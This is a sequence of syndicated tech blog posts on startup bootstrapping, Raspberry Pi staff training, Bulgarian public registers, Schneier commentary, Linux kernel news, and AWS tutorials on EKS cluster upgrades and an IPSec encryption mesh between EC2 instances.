Bootstrapping to $30 Million ARR

Post Syndicated from Yev original https://www.backblaze.com/blog/startup-tips-bootstrapping-to-30-million-arr/

Backblaze Billboard on Highway 101 in Silicon Valley, 2011
Backblaze will be celebrating its 12th year in business this coming April 20th. We’ve steadily grown over the years, and this year have reached $30 million ARR (annual recurring revenue). We’ve accomplished this with only $3.1 million in funding over the years, having successfully bootstrapped the company with founder contributions and cash flow since the very beginning.

Last year our CEO and co-founder Gleb Budman wrote a series of posts on entrepreneurship that detailed our early years and some lessons learned that entrepreneurs can apply for themselves.

Recently, Gleb did a follow-on webinar on BrightTALK covering many of the series’ main points.
Given the time constraints most entrepreneurs face, I’ll highlight what I consider some of the key lessons for startups that Gleb outlined in both the entrepreneurial series and the webinar.

Gleb Budman on BrightTALK Founders Series

Gleb’s webinar on BrightTALK

Creating Your Product

Gleb’s first article, How Backblaze Got Started: The Problem, The Solution, and the Stuff In-Between, starts with one of the most critical aspects for any successful company: defining the real problem you’re trying to solve. In Gleb’s words, “The entrepreneur builds things to solve problems — your own or someone else’s.”

So the question is how do you go about defining the problem? The most obvious place to start is to look at pain points you’re trying to address and then defining the specific elements that contribute to them. Can you solve the problem by taking away or changing one of those elements or multiple elements? Or, is it a matter of adding in new elements to shift away the pain points?

In our case, there was an obvious need in the market for backing up computers. There were already solutions on the market that, at least in theory, provided a backup solution, yet the majority of people still didn’t use one. The question was why?

Just because solutions exist doesn’t mean the problem is solved. After a series of deep dives into why people weren’t backing up, we discovered that the major problem was that backup solutions were too complicated for most people. They recognized they should be backing up, but weren’t willing to invest the time to learn how to use one of the existing services. So the problem Backblaze was originally solving wasn’t backup in general, it was taking away the learning curve to use a backup solution.

Once you have the problem clearly defined, you can proceed to design a solution that will solve it. Of course the solution itself will likely be defined by market forces, most notably, price. As Gleb touches on in the following video clip, pricing needs to be built into the solution from the outset.

Surviving Your First Year

Once you’ve determined the problem you want to solve, the next step is to create the infrastructure, i.e. the company, in order to build the solution. With that in mind, your primary goals for that first year should be: set up the company correctly, build and launch your minimal viable product, and most importantly, survive.

Setting up the company correctly is critical. A company is only as successful as the people in it. At all stages of growth, it’s critical that people have clear definitions of what is expected of them, but in the beginning it’s especially important to make sure people know what they need to do and the vision that’s driving the business.

From the start you need to determine the company, product, and development resources you need, define roles to be filled, and assign responsibilities once key players start joining your team. It’s very common in the early stages of a startup for everyone to be working on the same tasks in a democratic process. That might be good for morale in the beginning, but can result in a lack of focused direction. Leadership must emerge and help steer the company towards the shared vision. With clearly defined roles and responsibilities, team members can collaborate on achieving specific milestones, ensuring forward momentum.

A far less exciting but equally important foundation for a startup is the legal entity. It’s easy to get caught up in the excitement of building a product and put off the less exciting legal aspects until you are ready to launch. However, trying to retroactively get all the legal requirements in place is far more difficult.

Ownership (equity) ratios need be locked in near the start of the company. Having this hammered down can avoid a lot of potential infighting down the line. If you plan on raising money, you will need to incorporate and issue stock. You may also want to create a Proprietary Information and Inventions Assignment (PIIA) document, which states that what you are all working on is owned by the company.

Once the (admittedly not terribly exciting) legal aspects are taken care of, the focus truly shifts to building your minimal viable product (MVP) and launching it. It’s natural to want to build the perfect product, but in today’s market it’s better to focus on what you think are the most important features and launch. As Gleb writes in Surviving Your First Year, “Launching forces a scoping of the feature set to what’s critical, rallies the company around a goal, starts building awareness of your company and solution, and pushes forward the learning process.” Once you launch your MVP, you’ll start receiving feedback and then the iteration process can start: more on that later.

Lastly, when it comes to surviving your first year, always make an effort to conserve your cash. It might be tempting to scale as quickly as you can by hiring a lot more employees and building out your infrastructure, but minimizing your burn rate is usually more important for long term success. For example, Backblaze spent only $94k to build and launch its beta online backup service. If you scale your startup’s people and infrastructure too fast, you might have to rush to find more funding, which typically means more dilution and more outsiders telling you what you should be doing — not great when you’re first starting out and trying to achieve your vision.

Gleb goes into more detail in this video clip:

Getting Your First Customers

When you’re finally ready to go, you should target people who will give you lots of feedback as your first customers. Often, this means friends and even family members that are willing to give you their opinions on what you’re doing. It’s important to press the people close to you to give you honest feedback, as sugar-coating comments might actually lead you to make incorrect conclusions about your product.

Once you have a chance to evaluate the initial feedback and iterate on it, consider a private beta launch. Backblaze’s initial launch target was to get 1,000 people to use the service. In his article, How to Get Your First 1,000 Customers, Gleb goes into detail on how Backblaze successfully used PR outreach to achieve the beta launch goal.

One of the PR tactics used was to give publications, such as Techcrunch, ArsTechnica, and SimpleHelp, a limited number of beta invites. This not only raised awareness, but it gave early beta users a feeling of exclusivity, which helped in getting beta users to provide honest feedback.

Equally important is to have a system in place to collect contact information from everyone that expresses interest, even if you can’t service them at the time. You always want to be building your customer pipeline and having mechanisms in place to collect leads is important for sustained growth.

Startup Highs and Lows

It’s unavoidable that every startup entrepreneur will have to face a number of unexpected lows that will supplant what seem as increasingly infrequent highs. Dealing with both is vital to sustain your business (and your mental health). Often times, what at first appears to be a low point can inspire actions that ultimately help drive your business to new highs.

In the following clip Gleb gives several examples of seemingly low points that Backblaze was ultimately able to turn into wins, or as Gleb says “turning lemons into lemonade.” Note: I recently wrote a post about similar turnarounds on the social media front, Making Lemonade: The Importance of Social Media and Community.

Building Culture

It might not be foremost in your mind at the start, but from day one of your startup you are building your company culture. Culture is a little more nebulous than product design (maybe a lot more nebulous), but it is equally important in the long run. Culture affects every aspect of how your company operates because it has a day to day effect on every employee and the decisions they make, as Gleb points out in this short clip.

A prime example of how company culture affects your business is Backblaze’s emphasis on transparency. One of the first major wins for Backblaze was the release of our first Storage Pod design back in 2009. Most companies would keep proprietary design IP (intellectual property), like the Storage Pod, under lock and key, because they provide a major competitive pricing advantage. Yet the cultural importance of transparency led to a decision to open source the Storage Pod design despite the risk of competitors taking the designs and copying them. It also enabled us to answer a common question, “How can you provide this service at this low a price?” by writing one blog post with specifications, photos, and a parts inventory showing exactly how we do it.

The result of that very risky decision was a massive increase in brand awareness. Hundreds of articles were written about Backblaze comprised of not just general-interest and news articles, but also business case studies examining the rare business decision to be so transparent about our IP.

All of this attention ultimately positioned Backblaze as a thought leader in the cloud backup space (later, also in cloud storage), allowing us to be mentioned in the same articles and to compete against far bigger companies, including Amazon, Google, and Microsoft.

I hope you enjoyed this TL:DR version of Gleb’s entrepreneurial series and would love to hear your thoughts in the comments section below. I highly encourage anyone involved in a startup to take the time to read the original series as time permits and watch the entire webinar on BrightTALK, Founders Spotlight: Gleb Budman, CEO, Backblaze.

Gleb Budman’s Series on Entrepreneurship on the Backblaze Blog:

  1. How Backblaze got Started: The Problem, The Solution, and the Stuff In-Between
  2. Building a Competitive Moat: Turning Challenges Into Advantages
  3. From Idea to Launch: Getting Your First Customers
  4. How to Get Your First 1,000 Customers
  5. Surviving Your First Year
  6. How to Compete with Giants
  7. The Decision on Transparency
  8. Early Challenges: Managing Cash Flow
  9. Early Challenges: Making Critical Hires

The post Bootstrapping to $30 Million ARR appeared first on Backblaze Blog | Cloud Storage & Cloud Backup.

Staff Picademy and the sacrificial Babbage

Post Syndicated from Alex Bate original https://www.raspberrypi.org/blog/staff-picademy-and-the-sacrificial-babbage/

Refill the coffee machine, unpack the sacrificial Babbages, and refresh the micro SD cards — it’s staff Picademy time!

Raspberry Pi Staff Picademy

Staff Picademy

Once a year, when one of our all-staff meeting brings together members of the Raspberry Pi team from across the globe, we host staff Picademy at our office. It’s two days of making and breaking where the coding-uninitiated — as well as the more experienced people! — are put through their paces and rewarded with Raspberry Pi Certified Educator status at the end.

Lest we forget the sacrificial Babbages and all they have done in the name of professional development

What is Picademy?

Picademy is our free two-day professional development programme where educators come together to gain knowledge and confidence in digital making and computing. On Day 1, you learn new skills; on Day 2, you put your learning to the test by finding some other participants and creating a project together, from scratch!

Our Picademy events in the United Kingdom and in North America have hosted more than 2000 Raspberry Pi Certified Educators, who have gone on to create after-school coding clubs, makerspaces, school computing labs, and other amazing things to increasethe accessibility of computing and digital making for tens of thousands of young people.

Why do we run staff Picademy?

Because we stand by what we preach: we believe in learning through making, and we want our staff to be able to attend events, volunteer at Picademy, Code Clubs, CoderDojos, and Raspberry Jams, and feel confident in what they say and do.

And also, because Picademy is really fun!

Stuff and things, bits and bobs: staples of any good Picademy

You don’t need to be techy to work at Raspberry Pi: we’re not all engineers. Our staff ranges from educators and web developers to researchers, programme managers, administrators, and accountants. And we think everyone should give coding a shot, so we love getting our staff together to allow them to explore a new skill — and have some fun in the process.

I *think* this has something to do with The MagPi and a Christmas tree?

At our staff Picademy events, we’ve made everything from automated rock bands out of tin foil to timelapse buggies, and it really is a wonderful experience to see people come together and, within two days, take a skillset that may be completely new to them and use it to create a fully working, imaginative project.

Timelapse buggy is a thing is beauty…as is Brian

Your turn

If you’re an educator looking to try something new in your classroom, keep an eye on our channels, because we’ll be announcing dates for Picademy 2019 soon. You will find them on the Picademy page and see them pop up if you follow the #Picademy tag on Twitter. We’ll also announce the dates and locations in our Raspberry Pi LEARN newsletter, so be sure to sign up.

And if you’d like to join the Raspberry Pi team and build something silly and/or amazing at next year’s staff Picademy, we have roles available in the UK, Ireland, and North America.

The post Staff Picademy and the sacrificial Babbage appeared first on Raspberry Pi.

Без регистри идва хаос

Post Syndicated from Bozho original https://blog.bozho.net/blog/3245

Често разбираме колко е важно нещо чак когато спре да го има. Такъв беше примерът с Търговския регистър – бяхме свикнали всичко да е достъпно онлайн, да можем да проверяваме актуалното състояние на фирма, без да разнасяме хартиени удостоверения, да подаваме онлайн документи за регистрация и промяна на обстоятелства за дружества.

Докато през август регистърът не спря за повече от две седмици. И тогава се оказа, че не могат да се осъществяват сделки, че някои фирми не могат да превеждат заплати. Търговският оборот не спря, но беше затруднен заради липсата на регистъра.

Регистърът „оцеля“ и ни остави важна поука – че публичните регистри са изключително важни и тяхната липса създава хаос. Търговският регистър е един от най-важните, но далеч не е единствен. Други ключови за държавата регистри са Националната база данни „Население“, поддържана от ГД „ГРАО“, имотният регистър, кадастърът, регистърът на МПС, регистърът на особените залози, кредитният регистър, регистърът на обществените поръчки, регистърът на акционерите към Централния депозитар. И още стотици секторни регистри и регистърчета – в сектор „Здравеопазване“, в сектор „Правосъдие“, в сектор „Туризъм“ и т.н.

Тези регистри не са просто следствие от желанието на държавата да контролира всички аспекти на обществения живот. Те до голяма степен допринасят за повече прозрачност и по-голямо спокойствие на участниците. Търговският регистър например ни гарантира, че правим бизнес с истинските представители на съответното дружество. Имотният регистър ни позволява да знаем пълната история на един имот. Регистърът на МПС позволява (макар и неефективно реализиран към момента) контрол на правилата за движение и съответно безопасността на участниците. Кредитният регистър позволява на банките да правят по-добра преценка за своите кредитополучатели. Регистърът на населението пък е необходимо условие за каквото и да било електронно управление.

Немалка част от всички регистри се водят и на хартия, но в дългосрочен план хартията ще отпадне. Това означава, че поддържането на дигиталната инфраструктура става все по-важна задача. За съжаление, много от тези регистри имат съществени проблеми – с поддръжката, с архитектурата, със сигурността и с прозрачността.

По всичко изглежда, че Търговският регистър „падна“, защото поддръжката му е била управлявана изключително зле. Други регистри са разработени по начин, който не предполага голямо натоварване – каквото би имало при работещо електронно управление. Сигурността на данните в регистрите също е спорна – криптирани ли са данните, кой има достъп, кой може да променя данни, оставя ли това следа? Не на последно място е прозрачността – регистрите уж са електронни, но не предоставят достатъчно информация публично или пък я предоставят по твърде неудобен и бюрократичен начин.

За решаване на всички тези проблеми има нормативна уредба (закони и наредби), стратегии и проекти. Но не бихме могли да кажем, че нещата се подобряват. В случаи като този с Търговския регистър може би дори се влошават – такъв сериозен срив се случва за първи път.

Проблемът в крайна сметка се корени не просто в експертизата, която държавата няма, или в невъзможността да контролира и използва външната експертиза, която си купува. Проблемът е в неразбирането на важността и критичността на тези регистри на политическо и управленско ниво.

Един регистър не е просто тетрадка с няколко графи, каквито вероятно са представите на много хора, не е дори и проста база данни с няколко колони. Регистрите са сложна система от данни и процеси, от софтуер и хардуер. Система, в която трябва да се прилагат настоящите добри практики и която има нужда от постоянно осъвременяване.

Регистрите, особено някои, са необходими както за електронното управление, така и за гражданския и търговския оборот. И тяхното неглижиране и неразбиране е проблем без тривиално решение.

(статията е първоначално публикувана в сп. Мениджър)

Marriott Hack Reported as Chinese State-Sponsored

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2018/12/marriott_hack_r.html

The New York Times and Reuters are reporting that China was behind the recent hack of Marriott Hotels. Note that this is still uncomfirmed, but interesting if it is true.

Reuters:

Private investigators looking into the breach have found hacking tools, techniques and procedures previously used in attacks attributed to Chinese hackers, said three sources who were not authorized to discuss the company’s private probe into the attack.

That suggests that Chinese hackers may have been behind a campaign designed to collect information for use in Beijing’s espionage efforts and not for financial gain, two of the sources said.

While China has emerged as the lead suspect in the case, the sources cautioned it was possible somebody else was behind the hack because other parties had access to the same hacking tools, some of which have previously been posted online.

Identifying the culprit is further complicated by the fact that investigators suspect multiple hacking groups may have simultaneously been inside Starwood’s computer networks since 2014, said one of the sources.

I used to have opinions about whether these attributions are true or not. These days, I tend to wait and see.

Making Cluster Updates Easy with Amazon EKS

Post Syndicated from Brandon Chavis original https://aws.amazon.com/blogs/compute/making-cluster-updates-easy-with-amazon-eks/

Kubernetes is rapidly evolving, with frequent feature releases, functionality updates, and bug fixes. Additionally, AWS periodically changes the way it configures Amazon Elastic Container Service for Kubernetes (Amazon EKS) to improve performance, support bug fixes, and enable new functionality. Previously, moving to a new Kubernetes version required you to re-create your cluster and migrate your applications. This is a time-consuming process that can result in application downtime.

Today, I’m excited to announce that EKS now performs managed, in-place cluster upgrades for both Kubernetes and EKS platform versions. This simplifies cluster operations and lets you quickly take advantage of the latest Kubernetes features, as well as the updates to EKS configuration and security patches, without any downtime. EKS also now supports Kubernetes version 1.11.5 for all new EKS clusters.

Updates for Kubernetes and EKS

There are two types of updates that you can apply to your EKS cluster, Kubernetes version updates and EKS platform version updates. Today, EKS supports upgrades between Kubernetes minor versions 1.10 and 1.11.

As new Kubernetes versions are released and validated for use with EKS, we will support three stable Kubernetes versions as part of the update process at any given time.

EKS platform versions

The EKS platform version contains Kubernetes patches and changes to the API server configuration. Platform versions are separate from but associated with Kubernetes minor versions.

When a new Kubernetes version is made available for EKS, its initial control plane configuration is released as the “eks.1” platform version. AWS releases new platform versions as needed to enable Kubernetes patches. AWS also releases new versions when there are EKS API server configuration changes that could affect cluster behavior.

Using this versioning scheme makes it possible to independently update the configuration of different Kubernetes versions. For example, AWS might need to release a patch for Kubernetes version 1.10 that is incompatible with Kubernetes version 1.11.

Currently, platform version updates are automatic. AWS plans to provide manual control over platform version updates through the UpdateClusterVersion API operation in the future.

Using the update API operations

There are three new EKS API operations to enable cluster updates:

  • UpdateClusterVersion
  • ListUpdates
  • DescribeUpdates

The UpdateClusterVersion operation can be used through the EKS CLI to start a cluster update between Kubernetes minor versions:

aws eks update-cluster-version --name Your-EKS-Cluster --kubernetes-version 1.11

You only need to pass in a cluster name and the desired Kubernetes version. You do not need to pick a specific patch version for Kubernetes. We pick patch versions that are stable and well-tested. This CLI command returns an “update” API object with several important pieces of information:

{
    "update" : {
        "updateId" : UUID,
        "updateStatus" : PENDING,
        "updateType" : VERSION-UPDATE
        "createdAt" : Timestamp
     }
 }

This update object lets you track the status of your requested modification to your cluster. This can show you if there was there an error due to a misconfiguration on your cluster and if the update in progress, completed, or failed.

You can also list and describe the status of the update independently, using the following operations:

aws eks list-updates --name Your-EKS-Cluster

This returns the in-flight updates for your cluster:

{
    "updates" : {
        "UUID-1",
        "UUID-2"
     },
     "nextToken" : null
 }

Finally, you can also describe a particular update to see details about the update’s status:

aws eks describe-update --name Your-EKS-Cluster --update-id UUID

{
    "update" : {
        "updateId" : UUID,
        "updateStatus" : FAILED,
        "updateType" : VERSION-UPDATE
        "createdAt" : Timestamp
        "error": {
            "errorCode" : DependentResourceNotFound
            "errorMessage" : The Role used for creating the cluster is deleted.
            "resources" : ["aws:iam:arn:role"] 
     }
 }

Considerations when updating

New Kubernetes versions introduce significant changes. I highly recommend that you test the behavior of your application against a new Kubernetes version before performing the update on a production cluster.

Generally, I recommend integrating EKS into your existing CI workflow to test how your application behaves on a new version before updating your production clusters.

Worker node updates

Today, EKS does not update your Kubernetes worker nodes when you update the EKS control plane. You are responsible for updating EKS worker nodes. You can find an overview of this process in Worker Node Updates.

The EKS team releases a set of EKS-optimized AMIs for worker nodes that correspond with each version of Kubernetes supported by EKS. You can find these AMIs listed in the documentation, and you can find the build configuration in a version-specific branch of the Amazon-EKS-AMI GitHub repository .

Getting started

You can start using Kubernetes version 1.11 today for all new EKS clusters. Use cluster updates to move to version 1.11 for all existing EKS clusters. You can learn more about the update process and APIs in our documentation.

New podcast: VP of Security answers your compliance and data privacy questions

Post Syndicated from Katie Doptis original https://aws.amazon.com/blogs/security/new-podcast-vp-of-security-answers-your-compliance-and-data-privacy-questions/

Does AWS comply with X program? How about GDPR? What about after Brexit? And what happens with machine learning data?

In the latest AWS Security & Compliance Podcast, we sit down with VP of Security Chad Woolf, who answers your compliance and data privacy questions. Including one of the most frequently asked questions from customers around the world, which is: how many compliance programs does AWS have/attest to/audit against?

Chad also shares what it was like to work at AWS in the early days. When he joined, AWS was housed on just a handful of floors, in a single building. Over the course of nearly nine years with the company, he has witnessed tremendous growth of the business and industry.

Listen to the podcast and hear about company history and get answers to your tough questions. If you have a compliance or data privacy question, you can submit it through our contact us form.

Want more AWS news? Follow us on Twitter.

[$] DMA and get_user_pages()

Post Syndicated from jake original https://lwn.net/Articles/774411/rss

In the RDMA microconference of the 2018 Linux Plumbers Conference (LPC),
John Hubbard, Dan Williams, and Matthew Wilcox led a discussion on the
problems surrounding get_user_pages() (and friends) and the
interaction with DMA. It is not the first time the topic has come up,
there was also a discussion about it at the
Linux Storage, Filesystem, and Memory-Management Summit back in April. In
a nutshell, the problem is that multiple parts of the kernel think they
have responsibility for the same chunk of memory, but they do not
coordinate their activities; as might be guessed, mayhem can sometimes ensue.

The x32 subarchitecture may be removed

Post Syndicated from corbet original https://lwn.net/Articles/774734/rss

The x32 subarchitecture
is a software variant of x86-64; it runs the processor in the 64-bit mode,
but uses 32-bit pointers and arithmetic. The idea is to get the advantages
of x86-64 without the extra memory usage that goes along with it. It
seems, though, that x32 is not much appreciated; few distributions support
it and the number of users appears to be small. So now Andy Lutomirski is
proposing
its eventual removal
:

I propose that we make CONFIG_X86_X32 depend on BROKEN for a release
or two and then remove all the code if no one complains. If anyone
wants to re-add it, IMO they’re welcome to do so, but they need to do
it in a way that is maintainable.

If there are x32 users out there, now would be a good time for them to
speak up.

Security updates for Wednesday

Post Syndicated from ris original https://lwn.net/Articles/774731/rss

Security updates have been issued by Arch Linux (chromium, firefox, lib32-openssl, lib32-openssl-1.0, openssl, openssl-1.0, texlive-bin, and wireshark-cli), Fedora (perl), openSUSE (pdns), Oracle (kernel), Red Hat (kernel), Slackware (mozilla), SUSE (kernel, postgresql10, qemu, and xen), and Ubuntu (firefox, freerdp, freerdp2, pixman, and poppler).

New Australian Backdoor Law

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2018/12/new_australian_.html

Last week, Australia passed a law giving the government the ability to demand backdoors in computers and communications systems. Details are still to be defined, but it’s really bad.

Note: Many people e-mailed me to ask why I haven’t blogged this yet. One, I was busy with other things. And two, there’s nothing I can say that I haven’t said many times before.

If there are more good links or commentary, please post them in the comments.

EDITED TO ADD (12/13): The Australian government response is kind of embarrassing.

Creating an opportunistic IPSec mesh between EC2 instances

Post Syndicated from Vesselin Tzvetkov original https://aws.amazon.com/blogs/security/creating-an-opportunistic-ipsec-mesh-between-ec2-instances/

IPSec diagram

IPSec (IP Security) is a protocol for in-transit data protection between hosts. Configuration of site-to-site IPSec between multiple hosts can be an error-prone and intensive task. If you need to protect N EC2 instances, then you need a full mesh of N*(N-1)IPSec tunnels. You must manually propagate every IP change to all instances, configure credentials and configuration changes, and integrate monitoring and metrics into the operation. The efforts to keep the full-mesh parameters in sync are enormous.

Full mesh IPSec, known as any-to-any, builds an underlying network layer that protects application communication. Common use cases are:

  • You’re migrating legacy applications to AWS, and they don’t support encryption. Examples of protocols without encryption are File Transfer Protocol (FTP), Hypertext Transfer Protocol (HTTP) or Lightweight Directory Access Protocol (LDAP).
  • You’re offloading protection to IPSec to take advantage of fast Linux kernel encryption and automated certificate management, the use case we focus on in this solution.
  • You want to segregate duties between your application development and infrastructure security teams.
  • You want to protect container or application communication that leaves an EC2 instance.

In this post, I’ll show you how to build an opportunistic IPSec mesh that sets up dynamic IPSec tunnels between your Amazon Elastic Compute Cloud (EC2) instances. IPSec is based on Libreswan, an open-source project implementing opportunistic IPSec encryption (IKEv2 and IPSec) on a large scale.

Solution benefits and deliverable

The solution delivers the following benefits (versus manual site-to-site IPSec setup):

  • Automatic configuration of opportunistic IPSec upon EC2 launch.
  • Generation of instance certificates and weekly re-enrollment.
  • IPSec Monitoring metrics in Amazon CloudWatch for each EC2 instance.
  • Alarms for failures via CloudWatch and Amazon Simple Notification Service (Amazon SNS).
  • An initial generation of a CA root key if needed, including IAM Policies and two customer master keys (CMKs) that will protect the CA key and instance key.

Out of scope

This solution does not deliver IPSec protection between EC2 instances and hosts that are on-premises, or between EC2 instances and managed AWS components, like Elastic Load Balancing, Amazon Relational Database Service, or Amazon Kinesis. Your EC2 instances must have general IP connectivity that allows NACLs and Security Groups. This solution cannot deliver extra connectivity like VPC peering or Transit VPC can.

Prerequisites

You’ll need the following resources to deploy the solution:

  • A trusted Unix/Linux/MacOS machine with AWS SDK for Python and OpenSSL
  • AWS admin rights in your AWS account (including API access)
  • AWS Systems Manager on EC2
  • Linux RedHat, Amazon Linux 2, or CentOS installed on the EC2 instances you want to configure
  • Internet access on the EC2 instances for downloading Linux packages and reaching AWS Systems Manager endpoint
  • The AWS services used by the solution, which are AWS Lambda, AWS Key Management Service (AWS KMS), AWS Identity and Access Management (IAM), AWS Systems Manager, Amazon CloudWatch, Amazon Simple Storage Service (Amazon S3), and Amazon SNS

Solution and performance costs

My solution does not require any additional charges to standard AWS services, since it uses well-established open source software. Involved AWS services are as follows:

  • AWS Lambda is used to issue the certificates. Per EC2 and per week, I estimate the use of two 30 second Lambda functions with 256 MB of allocated memory. For 100 EC2 instances, the cost will be several cents. See AWS Lambda Pricing for details.
  • Certificates have no charge, since they’re issued by the Lambda function.
  • CloudWatch Events and Amazon S3 Storage usage are within the free tier policy.
  • AWS Systems Manager has no additional charge.
  • AWS EC2 is a standard AWS service on which you deploy your workload. There are no charges for IPSec encryption.
  • EC2 CPU performance decrease due to encryption is negligible since we use hardware encryption support of the Linux kernel. The IKE negotiation that is done by the OS in your CPU may add minimal CPU overhead depending on the number of EC2 instances involved.

Installation (one-time setup)

To get started, on a trusted Unix/Linux/MacOS machine that has admin access to your AWS account and AWS SDK for Python already installed, complete the following steps:

  1. Download the installation package from https://github.com/aws-quickstart/quickstart-ec2-ipsec-mesh.
  2. Edit the following files in the package to match your network setup:
    • config/private should contain all networks with mandatory IPSec protection, such as EC2s that should only be communicated with via IPSec. All of these hosts must have IPSec installed.
    • config/clear should contain any networks that do not need IPSec protection. For example, these might include Route 53 (DNS), Elastic Load Balancing, or Amazon Relational Database Service (Amazon RDS).
    • config/clear-or-private should contain networks with optional IPSec protection. These networks will start clear and attempt to add IPSec.
    • config/private-or-clear should also contain networks with optional IPSec protection. However, these networks will start with IPSec and fail back to clear.
  3. Execute ./aws_setup.py and carefully set and verify the parameters. Use -h to view help. If you don’t provide customized options, default values will be generated. The parameters are:
    • Region to install the solution (default: your AWS Command Line Interface region)
    • Buckets for configuration, sources, published host certificates and CA storage. (Default: random values that follow the pattern ipsec-{hostcerts|cacrypto|sources}-{stackname} will be generated.) If the buckets do not exist, they will be automatically created.
    • Reuse of an existing CA? (default: no)
    • Leave encrypted backup copy of the CA key? The password will be printed to stdout (default: no)
    • Cloud formation stackname (default: ipsec-{random string}).
    • Restrict provisioning to certain VPC (default: any)

     
    Here is an example output:

    
                ./aws_setup.py  -r ca-central-1 -p ipsec-host-v -c ipsec-crypto-v -s ipsec-source-v
                Provisioning IPsec-Mesh version 0.1
                
                Use --help for more options
                
                Arguments:
                ----------------------------
                Region:                       ca-central-1
                Vpc ID:                       any
                Hostcerts bucket:             ipsec-host-v
                CA crypto bucket:             ipsec-crypto-v
                Conf and sources bucket:      ipsec-source-v
                CA use existing:              no
                Leave CA key in local folder: no
                AWS stackname:                ipsec-efxqqfwy
                ---------------------------- 
                Do you want to proceed ? [yes|no]: yes
                The bucket ipsec-source-v already exists
                File config/clear uploaded in bucket ipsec-source-v
                File config/private uploaded in bucket ipsec-source-v
                File config/clear-or-private uploaded in bucket ipsec-source-v
                File config/private-or-clear uploaded in bucket ipsec-source-v
                File config/oe-cert.conf uploaded in bucket ipsec-source-v
                File sources/enroll_cert_lambda_function.zip uploaded in bucket ipsec-source-v
                File sources/generate_certifcate_lambda_function.zip uploaded in bucket ipsec-source-v
                File sources/ipsec_setup_lambda_function.zip uploaded in bucket ipsec-source-v
                File sources/cron.txt uploaded in bucket ipsec-source-v
                File sources/cronIPSecStats.sh uploaded in bucket ipsec-source-v
                File sources/ipsecSetup.yaml uploaded in bucket ipsec-source-v
                File sources/setup_ipsec.sh uploaded in bucket ipsec-source-v
                File README.md uploaded in bucket ipsec-source-v
                File aws_setup.py uploaded in bucket ipsec-source-v
                The bucket ipsec-host-v already exists
                Stack ipsec-efxqqfwy creation started. Waiting to finish (ca 3-5 min)
                Created CA CMK key arn:aws:kms:ca-central-1:123456789012:key/abcdefgh-1234-1234-1234-abcdefgh123456
                Certificate generation lambda arn:aws:lambda:ca-central-1:123456789012:function:GenerateCertificate-ipsec-efxqqfwy
                Generating RSA private key, 4096 bit long modulus
                .............................++
                .................................................................................................................................................................................................................................................................................................................................................................................++
                e is 65537 (0x10001)
                Certificate and key generated. Subject CN=ipsec.ca-central-1 Valid 10 years
                The bucket ipsec-crypto-v already exists
                Encrypted CA key uploaded in bucket ipsec-crypto-v
                CA cert uploaded in bucket ipsec-crypto-v
                CA cert and key remove from local folder
                Lambda functionarn:aws:lambda:ca-central-1:123456789012:function:GenerateCertificate-ipsec-efxqqfwy updated
                Resource policy for CA CMK hardened - removed action kms:encrypt
                
                done :-)
            

Launching the EC2 Instance

Now that you’ve installed the solution, you can start launching EC2 instances. From the EC2 Launch Wizard, execute the following steps. The instructions assume that you’re using RedHat, Amazon Linux 2, or CentOS.

Note: Steps or details that I don’t explicitly mention can be set to default (or according to your needs).

  1. Select the IAM Role already configured by the solution with the pattern Ec2IPsec-{stackname}
     
    Figure 1: Select the IAM Role

    Figure 1: Select the IAM Role

  2. (You can skip this step if you are using Amazon Linux 2.) Under Advanced Details, select User data as text and activate the AWS Systems Manager Agent (SSM Agent) by providing the following string (for RedHat and CentOS 64 Bits only):
    
        #!/bin/bash
        sudo yum install -y https://s3.amazonaws.com/ec2-downloads-windows/SSMAgent/latest/linux_amd64/amazon-ssm-agent.rpm
        sudo systemctl start amazon-ssm-agent
        

     

    Figure 2: Select User data as text and activate the AWS Systems Manager Agent

    Figure 2: Select User data as text and activate the AWS Systems Manager Agent

  3. Set the tag name to IPSec with the value todo. This is the identifier that triggers the installation and management of IPsec on the instance.
     
    Figure 3: Set the tag name to "IPSec" with the value "todo"

    Figure 3: Set the tag name to “IPSec” with the value “todo”

  4. On the Configuration page for the security group, allow ESP (Protocol 50) and IKE (UDP 500) for your network, like 172.31.0.0/16. You need to enter these values as shown in following screen:
     
    Figure 4: Enter values on the "Configuration" page

    Figure 4: Enter values on the “Configuration” page

After 1-2 minutes, the value of the IPSec instance tag will change to enabled, meaning the instance is successfully set up.
 

Figure 5: Look for the "enabled" value for the IPSec key

Figure 5: Look for the “enabled” value for the IPSec key

So what’s happening in the background?

 

Figure 6: Architectural diagram

Figure 6: Architectural diagram

As illustrated in the solution architecture diagram, the following steps are executed automatically in the background by the solution:

  1. An EC2 launch triggers a CloudWatch event, which launches an IPSecSetup Lambda function.
  2. The IPSecSetup Lambda function checks whether the EC2 instance has the tag IPSec:todo. If the tag is present, the Lambda function issues a certificate calling a GenerateCertificate Lambda.
  3. The GenerateCertificate Lambda function downloads the encrypted CA certificate and key.
  4. The GenerateCertificate Lambda function decrypts the CA key with a customer master key (CMK).
  5. The GenerateCertificate Lambda function issues a host certificate to the EC2 instance. It encrypts the host certificate and key with a KMS generated random secret in PKCS12 structure. The secret is envelope-encrypted with a dedicated CMK.
  6. The GenerateCertificate Lambda function publishes the issued certificates to your dedicated bucket for documentation.
  7. The IPSec Lambda function calls and runs the installation via SSM.
  8. The installation downloads the configuration and installs python, aws-sdk, libreswan, and curl if needed.
  9. The EC2 instance decrypts the host key with the dedicated CMK and installs it in the IPSec database.
  10. A weekly scheduled event triggers reenrollment of the certificates via the Reenrollcertificates Lambda function.
  11. The Reenrollcertificates Lambda function triggers the IPSecSetup Lambda (call event type: execution). The IPSecSetup Lambda will renew the certificate only, leaving the rest of the configuration untouched.

Testing the connection on the EC2 instance

You can log in to the instance and ping one of the hosts in your network. This will trigger the IPSec connection and you should see successful answers.


        $ ping 172.31.1.26
        
        PING 172.31.1.26 (172.31.1.26) 56(84) bytes of data.
        64 bytes from 172.31.1.26: icmp_seq=2 ttl=255 time=0.722 ms
        64 bytes from 172.31.1.26: icmp_seq=3 ttl=255 time=0.483 ms
        

To see a list of IPSec tunnels you can execute the following:


        sudo ipsec whack --trafficstatus
        

Here is an example of the execution:
 

Figure 7: Example execution

Figure 7: Example execution

Changing your configuration or installing it on already running instances

All configuration exists in the source bucket (default: ipsec-source prefix), in files for libreswan standard. If you need to change the configuration, follow the following instructions:

  1. Review and update the following files:
    1. oe-conf, which is the configuration for libreswan
    2. clear, private, private-to-clear and clear-to-ipsec, which should contain your network ranges.
  2. Change the tag for the IPSec instance to
    IPSec:todo.
  3. Stop and Start the instance (don’t restart). This will retrigger the setup of the instance.
     
